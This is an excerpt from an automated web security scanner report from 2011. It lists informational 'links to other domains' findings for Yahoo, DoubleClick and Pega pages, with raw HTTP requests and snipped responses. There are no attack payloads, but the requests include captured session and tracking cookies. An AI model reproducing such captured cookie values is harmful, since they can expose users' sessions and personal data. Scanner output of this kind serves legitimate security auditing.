02288:HEAD/Y=YAHOO/EXP=1308018324/L=WpYVpkSO8Unm3NorTdAdCwCBrcHW8032qnQAAx0m/B=ZxRMH0wNPHU-/J=1308011124318078/K=wvdwsF2H9WYXNggUTsyZHQ/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128uens0a(gid$WpYVpkSO8Unm3NorTdAdCwCBrcHW8032qnQAAx0m,st$1308011124243258,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.36. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /registration?.intl=us&.pd=flickrsignin_ver%253D0%2526c%253DJvVF95K62e6PzdPu7MBv2V8-%2526ivt%253D%2526sg%253D&new=1&.done=https%3A//login.yahoo.com/config/validate%3F.src=flickrsignin%26.pc=8190%26.scrumb=0%26.pd=c%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl=us%26.done=http%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne&.src=flickrsignin&.v=0&.u=2f7737p6vdago&partner=&.partner=&pkg=&stepid=&.p=&promo=&.last= HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 52347


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
</noscript>
<link href="https://s.yimg.com/lq/lib/membership/build/css/registration/221532.css" type="text/css" rel="stylesheet" />


<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150001817 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
01817:HEAD/Y=YAHOO/EXP=1308018266/L=jWQKCUSO8Unm3NorTdAdCwDGrcHW8032qjoABvjA/B=KNlLH0wNPKo-/J=1308011066731615/K=.eisFjJoQU_0BuMYGRJFOg/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128k9ab78(gid$jWQKCUSO8Unm3NorTdAdCwDGrcHW8032qjoABvjA,st$1308011066737139,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.37. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.forexfactory.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 14 Jun 2011 12:02:39 GMT
Expires: Tue, 14 Jun 2011 12:02:39 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 389
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://px.owneriq.net/ep?sid%5B%5D=133789898&sid%5B%5D=133443903&sid%5B%5D=133663613&rid%5B%5D=1203653&rid%5B%5D=1203654&rid%5B%5D=1203953" width="1" height="1" style="display: none;"/></body>
...[SNIP]...
18.38. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Fabuse%25252F HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://www.flickr.com/abuse/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:25:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42303


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<meta http-equiv="refresh" content="900">

<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...
<!-- static header -->

<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.5.css">
<style type="text/css">
...[SNIP]...
<a id="ygmalogo" href="http://www.flickr.com/"><img id="ygmalogoimg" src="https://s.yimg.com/lq/i/reg/flickr-yahoo-logo-us-trans.gif" alt="Yahoo!" name="ygmalogoimg"></a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://s.yimg.com/lq/combo?yui-ssl/2.8.1/build/yahoo/yahoo-min.js&yui-ssl/2.8.1/build/dom/dom-min.js&yui-ssl/2.8.1/build/event/event-min.js&yui-ssl/2.8.1/build/animation/animation-min.js"></script>
...[SNIP]...
</script>
<script src="https://s.yimg.com/lq/lib/reg/js/login_md5_217221.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128bdjgdp(gid$OPLkB0WTcKDm3NorTdAdCwDorcHW8032qmcAAhQY,st$1308011111151186,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.39. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<meta http-equiv="refresh" content="900">

<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...
<!-- static header -->

<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.5.css">
<style type="text/css">
...[SNIP]...
<a id="ygmalogo" href="http://www.flickr.com/"><img id="ygmalogoimg" src="https://s.yimg.com/lq/i/reg/flickr-yahoo-logo-us-trans.gif" alt="Yahoo!" name="ygmalogoimg"></a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://s.yimg.com/lq/combo?yui-ssl/2.8.1/build/yahoo/yahoo-min.js&yui-ssl/2.8.1/build/dom/dom-min.js&yui-ssl/2.8.1/build/event/event-min.js&yui-ssl/2.8.1/build/animation/animation-min.js"></script>
...[SNIP]...
</script>
<script src="https://s.yimg.com/lq/lib/reg/js/login_md5_217221.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ujrlb6(gid$i2KKlkWTcKDm3NorTdAdCwBqrcHW8032qhgADh98,st$1308011032940525,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.40. http://members.pega.com/cookiecheck.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.pega.com
Path:   /cookiecheck.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cookiecheck.asp?pcd=/login.asp HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:27:56 GMT
Date: Tue, 14 Jun 2011 12:28:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 31590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/
...[SNIP]...
<li class="leaf first menu-mlid-11296"><a class="external" target="_blank" href="http://www.facebook.com/pegasystems" title="">.. Facebook</a>
...[SNIP]...
<li class="leaf menu-mlid-11297"><a class="external" target="_blank" href="http://www.twitter.com/pegasystems" title="">.. Twitter</a>
...[SNIP]...
<li class="leaf last menu-mlid-11298"><a class="external" target="_blank" href="http://www.youtube.com/pegasystems" title="">.. YouTube</a>
...[SNIP]...
18.41. http://members.pega.com/pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.pega.com
Path:   /pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css?Z HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Tue, 14 Jun 2011 12:35:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...
18.42. http://my.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=HB&en=utf-8&npv=1&rn=1307974279506 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=cBa1s.500qJTZNubvsVqIwmDOX3Ot9CBpA7wNjPY4LtYQDYnOneU0AAdjgLGuOn9bfCFnFD71Ynokl3QKYaeg.KjNBZZCsWlLyPnvYNXziPQC2L1KSX2Eix8n5CdVzlFcrBdTqYXU.W_9agQiGPw6cCcApIX1ShDPTIp1l2Oegp9DJ9x4i.VfYjiOS3Wj7CQ5SlgPldzHw5JCY6qvvKhmO4Bk6MGWNEdY4gDAkpAIcXhryA0mmue1eS7g_KheES6DWNEiTC5Q8jMldqZTvHFtg1T6PwgIOyCiJXGxRkL.kP365o21.799Doz.QZ6wqUSLdgAR5v2qg8Klw7DBuRsebKj8ETpo.jRvM0vWOK7JKcEG0CWZ3.0E0WXpw1wcLU4N_K30WHT24Q3rbVSQAqOQcdQ3_0KBth3f4QmXtrScY8yRkYi_y4xTqsIxZ0XsgLLR7nTZSL_dbvE9NzBCREpMYCtVBLj3VhOfB7DYGzVYVXPUCT025joRZAE2OS3WQLUDdyb57IjLDQiQ0PGiLty3vwQyWVkHoglJ7wh3Ss2X0Waq1kJ7cr986TPvhruPZpw8irEmZS.piNAn5P.yTMsCM7O2zGP8c6Mc.CnsnVG9i8MliONQjcBKjBRa_IUHmbYyrVTg08slSkRzIIm0vordSiKFkztO643ZBIEa2pbQvm1L8PVTmzUfGogu2MsUKzFQegns2IhGpnmt7zaz5ou&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQECplqhAOW0IQHCspECpQJxAAS18QAFflEBx9uBAqSeoQDjXfEBxMJRAALUcQHG8IEA57PxAqO7o%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 5840

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128likncl(gid$EgAyGWKL8NLm3NorTdAdCxKxrcHW8032GogAAkDs,st$1307974280148310,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.43. http://my.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=LREC&en=utf-8&npv=1&rn=1307974281568 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=cBa1s.500qJTZNubvsVqIwmDOX3Ot9CBpA7wNjPY4LtYQDYnOneU0AAdjgLGuOn9bfCFnFD71Ynokl3QKYaeg.KjNBZZCsWlLyPnvYNXziPQC2L1KSX2Eix8n5CdVzlFcrBdTqYXU.W_9agQiGPw6cCcApIX1ShDPTIp1l2Oegp9DJ9x4i.VfYjiOS3Wj7CQ5SlgPldzHw5JCY6qvvKhmO4Bk6MGWNEdY4gDAkpAIcXhryA0mmue1eS7g_KheES6DWNEiTC5Q8jMldqZTvHFtg1T6PwgIOyCiJXGxRkL.kP365o21.799Doz.QZ6wqUSLdgAR5v2qg8Klw7DBuRsebKj8ETpo.jRvM0vWOK7JKcEG0CWZ3.0E0WXpw1wcLU4N_K30WHT24Q3rbVSQAqOQcdQ3_0KBth3f4QmXtrScY8yRkYi_y4xTqsIxZ0XsgLLR7nTZSL_dbvE9NzBCREpMYCtVBLj3VhOfB7DYGzVYVXPUCT025joRZAE2OS3WQLUDdyb57IjLDQiQ0PGiLty3vwQyWVkHoglJ7wh3Ss2X0Waq1kJ7cr986TPvhruPZpw8irEmZS.piNAn5P.yTMsCM7O2zGP8c6Mc.CnsnVG9i8MliONQjcBKjBRa_IUHmbYyrVTg08slSkRzIIm0vordSiKFkztO643ZBIEa2pbQvm1L8PVTmzUfGogu2MsUKzFQegns2IhGpnmt7zaz5ou&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQECplqhAOW0IQHCspECpQJxAAS18QAFflEBx9uBAqSeoQDjXfEBxMJRAALUcQHG8IEA57PxAqO7o%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:21 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7311

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128na36pm(gid$C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu,st$1307974281949293,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.44. http://my.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ1&en=utf-8&npv=1&rn=1307974280566 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=cBa1s.500qJTZNubvsVqIwmDOX3Ot9CBpA7wNjPY4LtYQDYnOneU0AAdjgLGuOn9bfCFnFD71Ynokl3QKYaeg.KjNBZZCsWlLyPnvYNXziPQC2L1KSX2Eix8n5CdVzlFcrBdTqYXU.W_9agQiGPw6cCcApIX1ShDPTIp1l2Oegp9DJ9x4i.VfYjiOS3Wj7CQ5SlgPldzHw5JCY6qvvKhmO4Bk6MGWNEdY4gDAkpAIcXhryA0mmue1eS7g_KheES6DWNEiTC5Q8jMldqZTvHFtg1T6PwgIOyCiJXGxRkL.kP365o21.799Doz.QZ6wqUSLdgAR5v2qg8Klw7DBuRsebKj8ETpo.jRvM0vWOK7JKcEG0CWZ3.0E0WXpw1wcLU4N_K30WHT24Q3rbVSQAqOQcdQ3_0KBth3f4QmXtrScY8yRkYi_y4xTqsIxZ0XsgLLR7nTZSL_dbvE9NzBCREpMYCtVBLj3VhOfB7DYGzVYVXPUCT025joRZAE2OS3WQLUDdyb57IjLDQiQ0PGiLty3vwQyWVkHoglJ7wh3Ss2X0Waq1kJ7cr986TPvhruPZpw8irEmZS.piNAn5P.yTMsCM7O2zGP8c6Mc.CnsnVG9i8MliONQjcBKjBRa_IUHmbYyrVTg08slSkRzIIm0vordSiKFkztO643ZBIEa2pbQvm1L8PVTmzUfGogu2MsUKzFQegns2IhGpnmt7zaz5ou&v=2; MYTMI=8; 